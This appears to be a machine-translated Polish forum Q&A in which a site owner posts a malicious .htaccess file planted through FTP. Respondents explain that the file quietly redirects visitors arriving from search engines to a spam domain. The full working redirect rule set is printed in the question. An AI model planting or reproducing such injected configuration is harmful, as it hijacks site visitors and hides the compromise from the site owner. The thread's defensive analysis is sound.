Zostało to przesłane do jednego z moich folderów FTP. Nie znam Apache, ale nadal jestem ciekawy - czy ktoś może mi powiedzieć, jakiego rodzaju niecne działanie ten plik próbuje popełnić? Dzięki!
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*netscape.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*hotbot.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*goto.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*infoseek.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mamma.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*alltheweb.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*lycos.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*metacrawler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*mail.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*dogpile.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://SPAMMER.info/0/go.php?sid=2 [R,L]
apache-2.2
security
mod-rewrite
.htaccess
owinofil
źródło
źródło
.htaccess
Plik dodany do mojej strony miały około 40 pustych linii na górze, po prostu dalej mylić mnie.Odpowiedzi:
To wysyła użytkowników pochodzących z wyszukiwarki do ostatniej witryny
SPAMMER.info
(patrz historia pytań o rzeczywistą witrynę).Szuka odsyłaczy próbujących się przed tobą ukryć , ponieważ prawdopodobnie nie uzyskujesz dostępu do witryny za pośrednictwem wyszukiwarek. Oznacza to, że jeśli przejdziesz bezpośrednio do adresu URL, wszystko wydaje się normalne. Jeśli jednak wejdziesz przez wyszukiwarkę, zostaniesz przekierowany.
Uwaga: nie ma to wpływu na roboty indeksujące, ponieważ ( przynajmniej googlebot ) nie ustawiają nagłówka strony odsyłającej.
źródło
Za każdym razem, gdy użytkownik z wyszukiwarki znajdzie dowolną stronę w Twojej witrynie, zostanie przekierowany na stronę spamową .info.
Jest to bardzo podstępne - nic nie zauważysz, ponieważ zwykle wpisujesz adres.
źródło
aby dodać więcej - najprawdopodobniej wyciekły twoje dane uwierzytelniające ftp. być może masz je zapisane w filezilla / total commander itp. istnieje mnóstwo złośliwego oprogramowania kradnącego je, a następnie „chodzącego” - logowania się na konta ftp, dołączania złośliwego javascript do index.php / html lub umieszczania podobnych plików na nowo.
źródło